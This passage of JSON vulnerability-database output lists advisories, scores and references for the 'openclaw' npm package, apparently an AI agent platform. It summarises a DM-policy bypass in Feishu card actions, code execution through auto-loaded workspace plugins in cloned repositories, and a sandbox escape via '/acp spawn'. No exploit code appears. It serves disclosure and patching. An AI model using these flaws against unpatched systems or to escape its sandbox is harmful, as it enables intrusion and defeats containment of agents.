gj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["GHSA-g2f6-pwvx-r275"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hynd-965v-n3aq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89119?format=json","vulnerability_id":"VCID-hz33-9efv-c7ef","summary":"OpenClaw: Feishu card actions could misclassify DMs and skip dmPolicy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nFeishu card-action callbacks could synthesize a message event with DM conversations classified as group conversations. That skipped `dmPolicy` enforcement for card actions, so a sender in a Feishu DM could trigger card-action flows that should have been blocked by a restrictive DM policy.\n\nThe issue is limited to Feishu card-action handling. Severity is medium.\n\n## Fix\n\nOpenClaw now resolves Feishu card-action chat type before dispatch, including API lookup when stored context is unavailable, and avoids falling through to group handling for DMs.\n\nFix commit:\n\n- `90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx"},{"reference_url":"https://github.com/advisories/GHSA-72q8-jcmc-97wx","reference_id":"GHSA-72q8-jcmc-97wx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-72q8-jcmc-97wx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-72q8-jcmc-97wx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hz33-9efv-c7ef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91550?format=json","vulnerability_id":"VCID-hzbt-fbgp-h7fd","summary":"Duplicate Advisory: OpenClaw: Workspace plugin auto-discovery allowed code execution from cloned repositories\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-99qw-6mr3-36qr. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 automatically discovers and loads plugins from .OpenClaw/extensions/ without explicit trust verification, allowing arbitrary code execution. Attackers can execute malicious code by including crafted workspace plugins in cloned repositories that execute when users run OpenClaw from the directory.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins"},{"reference_url":"https://github.com/advisories/GHSA-j5qh-5234-4rqp","reference_id":"GHSA-j5qh-5234-4rqp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j5qh-5234-4rqp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-j5qh-5234-4rqp"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hzbt-fbgp-h7fd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50762?format=json","vulnerability_id":"VCID-j6nj-gf5b-1khk","summary":"OpenClaw: Sandboxed /acp spawn requests could initialize host ACP sessions\nSandboxed requester sessions could reach host-side ACP session initialization through `/acp spawn`.\n\nOpenClaw already blocked `sessions_spawn({ runtime: \"acp\" })` from sandboxed sessions, but the slash-command path initialized ACP directly without applying the same host-runtime guard first.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27646","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03489","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03475","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27646"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/61000b8e4ded919ca1a825d4700db4cb3fdc56e3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-25T19:15:20Z/"}],"url":"https://github.com/openclaw/openclaw/commit/61000b8e4ded919ca1a825d4700db4cb3fdc56e3"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://vulncheck.com/advisories/openclaw-mar-sandbox-escape-via-acp-spawn-command","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-25T19:15:20Z/"}],"url":"https://vulncheck.com/advisories/openclaw-mar-sandbox-escape-via-acp-spawn-command"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27646","reference_id":"CVE-2026-27646","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27646"},{"reference_url":"https://github.com/advisories/GHSA-9q36-67vc-rrwg","reference_id":"GHSA-9q36-67vc-rrwg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9q36-67vc-rrwg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q36-67vc-rrwg","reference_id":"GHSA-9q36-67vc-rrwg","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-25T19:15:20Z/"}],"url":"https:/